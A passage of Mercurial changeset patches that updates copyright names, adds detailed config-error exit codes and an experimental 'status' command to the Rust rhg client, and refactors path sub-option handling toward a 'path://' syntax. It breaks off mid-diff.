mpm is not a fan of this partitioning strategy when files are involved. + olivia is not a fan of this partitioning strategy when files are involved. In his words: Single-threaded Mercurial makes a point of creating and visiting diff --git a/rust/hgcli/README.md b/rust/hgcli/README.md --- a/rust/hgcli/README.md +++ b/rust/hgcli/README.md @@ -32,7 +32,7 @@ Mercurial Distributed SCM (version 5.3.1+433-f99cd77d53dc+20200331) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-2020 Matt Mackall and others + Copyright (C) 2005-2020 Olivia Mackall and others This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -1700,7 +1700,7 @@ extra['console'] = [ { 'script': 'hg', - 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others', + 'copyright': 'Copyright (C) 2005-2021 Olivia Mackall and others', 'product_version': version, } ] @@ -1776,7 +1776,7 @@ setup( name='mercurial', version=setupversion, - author='Matt Mackall and many others', + author='Olivia Mackall and many others', author_email='mercurial@mercurial-scm.org', url='https://mercurial-scm.org/', download_url='https://mercurial-scm.org/release/', diff --git a/tests/logexceptions.py b/tests/logexceptions.py --- a/tests/logexceptions.py +++ b/tests/logexceptions.py @@ -1,6 +1,6 @@ # logexceptions.py - Write files containing info about Mercurial exceptions # -# Copyright 2017 Matt Mackall <mpm@selenic.com> +# Copyright 2017 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -2,7 +2,7 @@ # # run-tests.py - Run a set of tests on Mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/tests/test-extension.t b/tests/test-extension.t --- a/tests/test-extension.t +++ b/tests/test-extension.t @@ -676,7 +676,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1555,7 +1555,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1566,7 +1566,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1580,7 +1580,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1642,7 +1642,7 @@ Mercurial Distributed SCM (version 3.5.2) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -575,7 +575,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/tests/test-hgrc.t b/tests/test-hgrc.t --- a/tests/test-hgrc.t +++ b/tests/test-hgrc.t @@ -84,7 +84,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ unset FAKEPATH diff --git a/tests/test-patchbomb.t b/tests/test-patchbomb.t --- a/tests/test-patchbomb.t +++ b/tests/test-patchbomb.t @@ -2998,7 +2998,7 @@ bad value setting ----------------- - $ echo 'intro=mpmwearaclownnose' >> $HGRCPATH + $ echo 'intro=oliviawearaclownnose' >> $HGRCPATH single rev @@ -3006,7 +3006,7 @@ From [test]: test this patch series consists of 1 patches. - warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f test foo MIME-Version: 1.0 @@ -3047,7 +3047,7 @@ $ hg email --date '1980-1-1 0:1' -v -t '~foo/bar@example.com' -f 'me*@example.com' -r '10' this patch series consists of 1 patches. - warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f me*@example.com ~foo/bar@example.com MIME-Version: 1.0 # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1616186037 -19800 # Sat Mar 20 02:03:57 2021 +0530 # Node ID 821929d59e01999b9185aabac71f40d0fabafdb4 # Parent d4ba4d51f85fc65935b79aff03c7f3d1bd14a642 rhg: add support for detailed exit code for ConfigParseError This patch adds basic support for detailed exit code to rhg with support for ConfigParseError. For now, if parsing the config results in error, we silently fallbacks to `false`. The python version in this case emits a traceback. Differential Revision: https://phab.mercurial-scm.org/D10253 diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,3 +1,4 @@ +use crate::exitcode; use crate::ui::utf8_to_local; use crate::ui::UiError; use crate::NoRepoInCwdError; @@ -14,7 +15,10 @@ #[derive(Debug)] pub enum CommandError { /// Exit with an error message and "standard" failure exit code. - Abort { message: Vec<u8> }, + Abort { + message: Vec<u8>, + detailed_exit_code: exitcode::ExitCode, + }, /// Exit with a failure exit code but no message. Unsuccessful, @@ -28,11 +32,19 @@ impl CommandError { pub fn abort(message: impl AsRef<str>) -> Self { + CommandError::abort_with_exit_code(message, exitcode::ABORT) + } + + pub fn abort_with_exit_code( + message: impl AsRef<str>, + detailed_exit_code: exitcode::ExitCode, + ) -> Self { CommandError::Abort { // TODO: bytes-based (instead of Unicode-based) formatting // of error messages to handle non-UTF-8 filenames etc: // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output message: utf8_to_local(message.as_ref()).into(), + detailed_exit_code: detailed_exit_code, } } @@ -64,7 +76,10 @@ impl From<ConfigValueParseError> for CommandError { fn from(error: ConfigValueParseError) -> Self { - CommandError::abort(error.to_string()) + CommandError::abort_with_exit_code( + error.to_string(), + exitcode::CONFIG_ERROR_ABORT, + ) } } @@ -85,6 +100,7 @@ b"abort: repository {} not found", get_bytes_from_path(at) ), + detailed_exit_code: exitcode::ABORT, }, RepoError::ConfigParseError(error) => error.into(), RepoError::Other(error) => error.into(), @@ -100,6 +116,7 @@ b"abort: no repository found in '{}' (.hg not found)!", get_bytes_from_path(cwd) ), + detailed_exit_code: exitcode::ABORT, } } } @@ -132,6 +149,7 @@ line_message, message ), + detailed_exit_code: exitcode::CONFIG_ERROR_ABORT, } } } diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,6 +6,9 @@ /// Generic abort pub const ABORT: ExitCode = 255; +// Abort when there is a config related error +pub const CONFIG_ERROR_ABORT: ExitCode = 30; + /// Generic something completed but did not succeed pub const UNSUCCESSFUL: ExitCode = 1; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -82,7 +82,14 @@ let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; blackbox.log_command_start(); let result = run(&invocation); - blackbox.log_command_end(exit_code(&result)); + blackbox.log_command_end(exit_code( + &result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + )); result } @@ -114,6 +121,7 @@ error, cwd.display() ))), + false, ) }) }); @@ -125,7 +133,13 @@ // "unsupported" error but that is not enforced by the type system. let on_unsupported = OnUnsupported::Abort; - exit(&initial_current_dir, &ui, on_unsupported, Err(error.into())) + exit( + &initial_current_dir, + &ui, + on_unsupported, + Err(error.into()), + false, + ) }); if let Some(repo_path_bytes) = &early_args.repo { @@ -145,6 +159,11 @@ repo_path_bytes ), }), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), ) } } @@ -160,6 +179,11 @@ &ui, OnUnsupported::from_config(&ui, &non_repo_config), Err(error.into()), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), ), }; @@ -176,13 +200,35 @@ repo_result.as_ref(), config, ); - exit(&initial_current_dir, &ui, on_unsupported, result) + exit( + &initial_current_dir, + &ui, + on_unsupported, + result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ) } -fn exit_code(result: &Result<(), CommandError>) -> i32 { +fn exit_code( + result: &Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> i32 { match result { Ok(()) => exitcode::OK, - Err(CommandError::Abort { .. }) => exitcode::ABORT, + Err(CommandError::Abort { + message: _, + detailed_exit_code, + }) => { + if use_detailed_exit_code { + *detailed_exit_code + } else { + exitcode::ABORT + } + } Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL, // Exit with a specific code and no error message to let a potential @@ -198,6 +244,7 @@ ui: &Ui, mut on_unsupported: OnUnsupported, result: Result<(), CommandError>, + use_detailed_exit_code: bool, ) -> ! { if let ( OnUnsupported::Fallback { executable }, @@ -238,18 +285,22 @@ } } } - exit_no_fallback(ui, on_unsupported, result) + exit_no_fallback(ui, on_unsupported, result, use_detailed_exit_code) } fn exit_no_fallback( ui: &Ui, on_unsupported: OnUnsupported, result: Result<(), CommandError>, + use_detailed_exit_code: bool, ) -> ! { match &result { Ok(_) => {} Err(CommandError::Unsuccessful) => {} - Err(CommandError::Abort { message }) => { + Err(CommandError::Abort { + message, + detailed_exit_code: _, + }) => { if !message.is_empty() { // Ignore errors when writing to stderr, we’re already exiting // with failure code so there’s not much more we can do. @@ -269,7 +320,7 @@ } } } - std::process::exit(exit_code(&result)) + std::process::exit(exit_code(&result, use_detailed_exit_code)) } macro_rules! subcommands { @@ -411,6 +462,7 @@ "abort: 'rhg.on-unsupported=fallback' without \ 'rhg.fallback-executable' set." )), + false, ) }) .to_owned(), diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -3,8 +3,6 @@ Invalid syntax: no value -TODO: add rhg support for detailed exit codes -#if no-rhg $ cat > .hg/hgrc << EOF > novaluekey > EOF @@ -37,7 +35,6 @@ $ hg showconfig config error at $TESTTMP/.hg/hgrc:1: unexpected leading whitespace: [section] [30] -#endif Reset hgrc diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -90,12 +90,9 @@ $ mkdir -p badrepo/.hg $ echo 'invalid-syntax' > badrepo/.hg/hgrc -TODO: add rhg support for detailed exit codes -#if no-rhg $ hg log -b -Rbadrepo default config error at badrepo/.hg/hgrc:1: invalid-syntax [30] -#endif $ hg log -b --cwd=inexistent default abort: $ENOENT$: 'inexistent' # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1616509729 -19800 # Tue Mar 23 19:58:49 2021 +0530 # Node ID e8ae91b1a63d45ff17739047b2ef5546f52973af # Parent 821929d59e01999b9185aabac71f40d0fabafdb4 rhg: raise wdir specific error for `hg debugdata` Helps remove the conditional in `test-debugcommands.t` for rhg. Differential Revision: https://phab.mercurial-scm.org/D10254 diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -35,6 +35,9 @@ #[allow(clippy::unreadable_literal)] pub const WORKING_DIRECTORY_REVISION: Revision = 0x7fffffff; +pub const WORKING_DIRECTORY_HEX: &str = + "ffffffffffffffffffffffffffffffffffffffff"; + /// The simplest expression of what we need of Mercurial DAGs. pub trait Graph { /// Return the two parents of the given `Revision`. diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -23,6 +23,8 @@ #[derive(derive_more::From)] pub enum RevlogError { InvalidRevision, + /// Working directory is not supported + WDirUnsupported, /// Found more than one entry whose ID match the requested prefix AmbiguousPrefix, #[from] diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs --- a/rust/hg-core/src/revset.rs +++ b/rust/hg-core/src/revset.rs @@ -7,7 +7,8 @@ use crate::revlog::changelog::Changelog; use crate::revlog::revlog::{Revlog, RevlogError}; use crate::revlog::NodePrefix; -use crate::revlog::{Revision, NULL_REVISION}; +use crate::revlog::{Revision, NULL_REVISION, WORKING_DIRECTORY_HEX}; +use crate::Node; /// Resolve a query string into a single revision. /// @@ -51,6 +52,10 @@ } } if let Ok(prefix) = NodePrefix::from_hex(input) { + if prefix.is_prefix_of(&Node::from_hex(WORKING_DIRECTORY_HEX).unwrap()) + { + return Err(RevlogError::WDirUnsupported); + } return revlog.get_node_rev(prefix); } Err(RevlogError::InvalidRevision) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -157,6 +157,9 @@ impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { + RevlogError::WDirUnsupported => CommandError::abort( + "abort: working directory revision cannot be specified", + ), RevlogError::InvalidRevision => CommandError::abort(format!( "abort: invalid revision identifier: {}", rev diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -531,17 +531,9 @@ Test WdirUnsupported exception -#if no-rhg $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff abort: working directory revision cannot be specified [255] -#else -TODO: add rhg support for (at least parsing) the working directory pseudo-changeset - $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff - abort: working directory revision cannot be specified (missing-correct-output !) - abort: invalid revision identifier: ffffffffffffffffffffffffffffffffffffffff (known-bad-output !) - [255] -#endif Test cache warming command # HG changeset patch # User Georges Racinet <georges.racinet@octobus.net> # Date 1615903923 -3600 # Tue Mar 16 15:12:03 2021 +0100 # Node ID c71e8d9e7f2a35e4c93c07cfa1d3dc7d58b07f9e # Parent e8ae91b1a63d45ff17739047b2ef5546f52973af rhg: Initial support for the 'status' command Only comparing the working directory with its first parent revision is supported. The core logic of dirstate handling and `stat`’ing files was already in `hg-core` supporting Python-based hg with Rust extensions, so this is mostly plumbing to rhg’s CLI. For now the command is experimental and disabled by default, since it has some bugs that causes a number of tests to fail. These failures can be seen with: tests/run-tests.py --rhg --extra-config-opt rhg.status=true Differential Revision: https://phab.mercurial-scm.org/D10239 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -212,10 +212,7 @@ } /// For accessing the working copy - - // The undescore prefix silences the "never used" warning. Remove before - // using. - pub fn _working_directory_vfs(&self) -> Vfs<'_> { + pub fn working_directory_vfs(&self) -> Vfs<'_> { Vfs { base: &self.working_directory, } diff --git a/rust/rhg/src/commands/status.rs b/rust/rhg/src/commands/status.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/commands/status.rs @@ -0,0 +1,315 @@ +// status.rs +// +// Copyright 2020, Georges Racinet <georges.racinets@octobus.net> +// +// This software may be used and distributed according to the terms of the +// GNU General Public License version 2 or any later version. + +use crate::error::CommandError; +use crate::ui::Ui; +use clap::{Arg, SubCommand}; +use hg; +use hg::errors::IoResultExt; +use hg::matchers::AlwaysMatcher; +use hg::operations::cat; +use hg::repo::Repo; +use hg::revlog::node::Node; +use hg::utils::hg_path::{hg_path_to_os_string, HgPath}; +use hg::{DirstateMap, StatusError}; +use hg::{HgPathCow, StatusOptions}; +use log::{info, warn}; +use std::convert::TryInto; +use std::fs; +use std::io::BufReader; +use std::io::Read; + +pub const HELP_TEXT: &str = " +Show changed files in the working directory + +This is a pure Rust version of `hg status`. + +Some options might be missing, check the list below. +"; + +pub fn args() -> clap::App<'static, 'static> { + SubCommand::with_name("status") + .alias("st") + .about(HELP_TEXT) + .arg( + Arg::with_name("all") + .help("show status of all files") + .short("-A") + .long("--all"), + ) + .arg( + Arg::with_name("modified") + .help("show only modified files") + .short("-m") + .long("--modified"), + ) + .arg( + Arg::with_name("added") + .help("show only added files") + .short("-a") + .long("--added"), + ) + .arg( + Arg::with_name("removed") + .help("show only removed files") + .short("-r") + .long("--removed"), + ) + .arg( + Arg::with_name("clean") + .help("show only clean files") + .short("-c") + .long("--clean"), + ) + .arg( + Arg::with_name("deleted") + .help("show only deleted files") + .short("-d") + .long("--deleted"), + ) + .arg( + Arg::with_name("unknown") + .help("show only unknown (not tracked) files") + .short("-u") + .long("--unknown"), + ) + .arg( + Arg::with_name("ignored") + .help("show only ignored files") + .short("-i") + .long("--ignored"), + ) +} + +/// Pure data type allowing the caller to specify file states to display +#[derive(Copy, Clone, Debug)] +pub struct DisplayStates { + pub modified: bool, + pub added: bool, + pub removed: bool, + pub clean: bool, + pub deleted: bool, + pub unknown: bool, + pub ignored: bool, +} + +pub const DEFAULT_DISPLAY_STATES: DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: false, + deleted: true, + unknown: true, + ignored: false, +}; + +pub const ALL_DISPLAY_STATES: DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: true, + deleted: true, + unknown: true, + ignored: true, +}; + +impl DisplayStates { + pub fn is_empty(&self) -> bool { + !(self.modified + || self.added + || self.removed + || self.clean + || self.deleted + || self.unknown + || self.ignored) + } +} + +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let status_enabled_default = false; + let status_enabled = invocation.config.get_option(b"rhg", b"status")?; + if !status_enabled.unwrap_or(status_enabled_default) { + return Err(CommandError::unsupported( + "status is experimental in rhg (enable it with 'rhg.status = true' \ + or enable fallback with 'rhg.on-unsupported = fallback')" + )); + } + + let ui = invocation.ui; + let args = invocation.subcommand_args; + let display_states = if args.is_present("all") { + // TODO when implementing `--quiet`: it excludes clean files + // from `--all` + ALL_DISPLAY_STATES + } else { + let requested = DisplayStates { + modified: args.is_present("modified"), + added: args.is_present("added"), + removed: args.is_present("removed"), + clean: args.is_present("clean"), + deleted: args.is_present("deleted"), + unknown: args.is_present("unknown"), + ignored: args.is_present("ignored"), + }; + if requested.is_empty() { + DEFAULT_DISPLAY_STATES + } else { + requested + } + }; + + let repo = invocation.repo?; + let mut dmap = DirstateMap::new(); + let dirstate_data = repo.hg_vfs().mmap_open("dirstate")?; + let parents = dmap.read(&dirstate_data)?; + let options = StatusOptions { + // TODO should be provided by the dirstate parsing and + // hence be stored on dmap. Using a value that assumes we aren't + // below the time resolution granularity of the FS and the + // dirstate. + last_normal_time: 0, + // we're currently supporting file systems with exec flags only + // anyway + check_exec: true, + list_clean: display_states.clean, + list_unknown: display_states.unknown, + list_ignored: display_states.ignored, + collect_traversed_dirs: false, + }; + let ignore_file = repo.working_directory_vfs().join(".hgignore"); // TODO hardcoded + let ((lookup, ds_status), pattern_warnings) = hg::status( + &dmap, + &AlwaysMatcher, + repo.working_directory_path().to_owned(), + vec![ignore_file], + options, + )?; + if !pattern_warnings.is_empty() { + warn!("Pattern warnings: {:?}", &pattern_warnings); + } + + if !ds_status.bad.is_empty() { + warn!("Bad matches {:?}", &(ds_status.bad)) + } + if !lookup.is_empty() { + info!( + "Files to be rechecked by retrieval from filelog: {:?}", + &lookup + ); + } + // TODO check ordering to match `hg status` output. + // (this is as in `hg help status`) + if display_states.modified { + display_status_paths(ui, &(ds_status.modified), b"M")?; + } + if !lookup.is_empty() { + let p1: Node = parents + .expect( + "Dirstate with no parents should not list any file to + be rechecked for modifications", + ) + .p1 + .into(); + let p1_hex = format!("{:x}", p1); + let mut rechecked_modified: Vec<HgPathCow> = Vec::new(); + let mut rechecked_clean: Vec<HgPathCow> = Vec::new(); + for to_check in lookup { + if cat_file_is_modified(repo, &to_check, &p1_hex)? { + rechecked_modified.push(to_check); + } else { + rechecked_clean.push(to_check); + } + } + if display_states.modified { + display_status_paths(ui, &rechecked_modified, b"M")?; + } + if display_states.clean { + display_status_paths(ui, &rechecked_clean, b"C")?; + } + } + if display_states.added { + display_status_paths(ui, &(ds_status.added), b"A")?; + } + if display_states.clean { + display_status_paths(ui, &(ds_status.clean), b"C")?; + } + if display_states.removed { + display_status_paths(ui, &(ds_status.removed), b"R")?; + } + if display_states.deleted { + display_status_paths(ui, &(ds_status.deleted), b"!")?; + } + if display_states.unknown { + display_status_paths(ui, &(ds_status.unknown), b"?")?; + } + if display_states.ignored { + display_status_paths(ui, &(ds_status.ignored), b"I")?; + } + Ok(()) +} + +// Probably more elegant to use a Deref or Borrow trait rather than +// harcode HgPathBuf, but probably not really useful at this point +fn display_status_paths( + ui: &Ui, + paths: &[HgPathCow], + status_prefix: &[u8], +) -> Result<(), CommandError> { + for path in paths { + // Same TODO as in commands::root + let bytes: &[u8] = path.as_bytes(); + // TODO optim, probably lots of unneeded copies here, especially + // if out stream is buffered + ui.write_stdout(&[status_prefix, b" ", bytes, b"\n"].concat())?; + } + Ok(()) +} + +/// Check if a file is modified by comparing actual repo store and file system. +/// +/// This meant to be used for those that the dirstate cannot resolve, due +/// to time resolution limits. +/// +/// TODO: detect permission bits and similar metadata modifications +fn cat_file_is_modified( + repo: &Repo, + hg_path: &HgPath, + rev: &str, +) -> Result<bool, CommandError> { + // TODO CatRev expects &[HgPathBuf], something like + // &[impl Deref<HgPath>] would be nicer and should avoid the copy + let path_bufs = [hg_path.into()]; + // TODO IIUC CatRev returns a simple Vec<u8> for all files + // being able to tell them apart as (path, bytes) would be nicer + // and OPTIM would allow manifest resolution just once. + let output = cat(repo, rev, &path_bufs).map_err(|e| (e, rev))?; + + let fs_path = repo + .working_directory_vfs() + .join(hg_path_to_os_string(hg_path).expect("HgPath conversion")); + let hg_data_len: u64 = match output.concatenated.len().try_into() { + Ok(v) => v, + Err(_) => { + // conversion of data length to u64 failed, + // good luck for any file to have this content + return Ok(true); + } + }; + let fobj = fs::File::open(&fs_path).when_reading_file(&fs_path)?; + if fobj.metadata().map_err(|e| StatusError::from(e))?.len() != hg_data_len + { + return Ok(true); + } + for (fs_byte, hg_byte) in + BufReader::new(fobj).bytes().zip(output.concatenated) + { + if fs_byte.map_err(|e| StatusError::from(e))? != hg_byte { + return Ok(true); + } + } + Ok(false) +} diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -358,7 +358,9 @@ files root config + status } + pub struct CliInvocation<'a> { ui: &'a Ui, subcommand_args: &'a ArgMatches<'a>, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616058775 -3600 # Thu Mar 18 10:12:55 2021 +0100 # Node ID f1f2961d2816840262131fc6c95c68280a80629a # Parent c71e8d9e7f2a35e4c93c07cfa1d3dc7d58b07f9e path: move handling of "default" (*) suboptions value inside __init__ With the introduction of `path://` scheme the handling of default value will need to be subtler. We do simple code movement first to clarify the future changes. Differential Revision: https://phab.mercurial-scm.org/D10260 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2190,16 +2190,12 @@ def __init__(self, ui): dict.__init__(self) - _path, base_sub_options = ui.configsuboptions(b'paths', b'*') for name, loc in ui.configitems(b'paths', ignoresub=True): # No location is the same as not existing. if not loc: continue - loc, sub = ui.configsuboptions(b'paths', name) - sub_opts = base_sub_options.copy() - sub_opts.update(sub) + loc, sub_opts = ui.configsuboptions(b'paths', name) self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) - self._default_sub_opts = base_sub_options def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. @@ -2234,9 +2230,7 @@ # Try to resolve as a local path or URI. try: # we pass the ui instance are warning might need to be issued - return path( - ui, None, rawloc=name, suboptions=self._default_sub_opts - ) + return path(ui, None, rawloc=name) except ValueError: raise error.RepoError(_(b'repository %s does not exist') % name) @@ -2334,17 +2328,19 @@ b'repo: %s' % rawloc ) - suboptions = suboptions or {} + _path, sub_opts = ui.configsuboptions(b'paths', b'*') + if suboptions is not None: + sub_opts.update(suboptions) # Now process the sub-options. If a sub-option is registered, its # attribute will always be present. The value will be None if there # was no valid sub-option. for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in suboptions: + if suboption not in sub_opts: setattr(self, attr, None) continue - value = func(ui, self, suboptions[suboption]) + value = func(ui, self, sub_opts[suboption]) setattr(self, attr, value) def _isvalidlocalpath(self, path): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616345535 -3600 # Sun Mar 21 17:52:15 2021 +0100 # Node ID 57218b7ffb2aaeb035e0470537c3377c809903b8 # Parent f1f2961d2816840262131fc6c95c68280a80629a path: extract the path validation logic into its own submethod We will need to re-use this logic for `path://` so we first extract it into its own method. Differential Revision: https://phab.mercurial-scm.org/D10261 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2320,13 +2320,7 @@ self.rawloc = rawloc self.loc = b'%s' % u - # When given a raw location but not a symbolic name, validate the - # location is valid. - if not name and not u.scheme and not self._isvalidlocalpath(self.loc): - raise ValueError( - b'location is not a URL or path to a local ' - b'repo: %s' % rawloc - ) + self._validate_path() _path, sub_opts = ui.configsuboptions(b'paths', b'*') if suboptions is not None: @@ -2343,6 +2337,19 @@ value = func(ui, self, sub_opts[suboption]) setattr(self, attr, value) + def _validate_path(self): + # When given a raw location but not a symbolic name, validate the + # location is valid. + if ( + not self.name + and not self.url.scheme + and not self._isvalidlocalpath(self.loc) + ): + raise ValueError( + b'location is not a URL or path to a local ' + b'repo: %s' % self.rawloc + ) + def _isvalidlocalpath(self, path): """Returns True if the given path is a potentially valid repository. This is its own function so that extensions can change the definition of # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616340702 -3600 # Sun Mar 21 16:31:42 2021 +0100 # Node ID 4821cb414a5c982876293cb6f41f98fc9473972a # Parent 57218b7ffb2aaeb035e0470537c3377c809903b8 path: extract sub-option logic into its own method We will need to re-use this logic for `path://` so we first extract it into its own method. Differential Revision: https://phab.mercurial-scm.org/D10262 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2323,19 +2323,13 @@ self._validate_path() _path, sub_opts = ui.configsuboptions(b'paths', b'*') + self._own_sub_opts = {} if suboptions is not None: + self._own_sub_opts = suboptions.copy() sub_opts.update(suboptions) + self._all_sub_opts = sub_opts.copy() - # Now process the sub-options. If a sub-option is registered, its - # attribute will always be present. The value will be None if there - # was no valid sub-option. - for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in sub_opts: - setattr(self, attr, None) - continue - - value = func(ui, self, sub_opts[suboption]) - setattr(self, attr, value) + self._apply_suboptions(ui, sub_opts) def _validate_path(self): # When given a raw location but not a symbolic name, validate the @@ -2350,6 +2344,18 @@ b'repo: %s' % self.rawloc ) + def _apply_suboptions(self, ui, sub_options): + # Now process the sub-options. If a sub-option is registered, its + # attribute will always be present. The value will be None if there + # was no valid sub-option. + for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): + if suboption not in sub_options: + setattr(self, attr, None) + continue + + value = func(ui, self, sub_options[suboption]) + setattr(self, attr, value) + def _isvalidlocalpath(self, path): """Returns True if the given path is a potentially valid repository. This is its own function so that extensions can change the definition of # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616065321 -3600 # Thu Mar 18 12:02:01 2021 +0100 # Node ID 83b0a5c0dfec1509edf6b450a1c8c03bbe057f14 # Parent 4821cb414a5c982876293cb6f41f98fc9473972a path: introduce a `path://` syntax to reference other path name This make it easier for a path to reuse the same location of another path with different parameter. This is useful to create path "alias" with common config option. This will become very useful to create path that reference a list of other path. This changeset focus on implemented the basic feature, future changesets will deal with various error management (and associated testing). Differential Revision: https://phab.mercurial-scm.org/D10263 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2197,6 +2197,9 @@ loc, sub_opts = ui.configsuboptions(b'paths', name) self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + for name, p in sorted(self.items()): + p.chain_path(ui, self) + def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. @@ 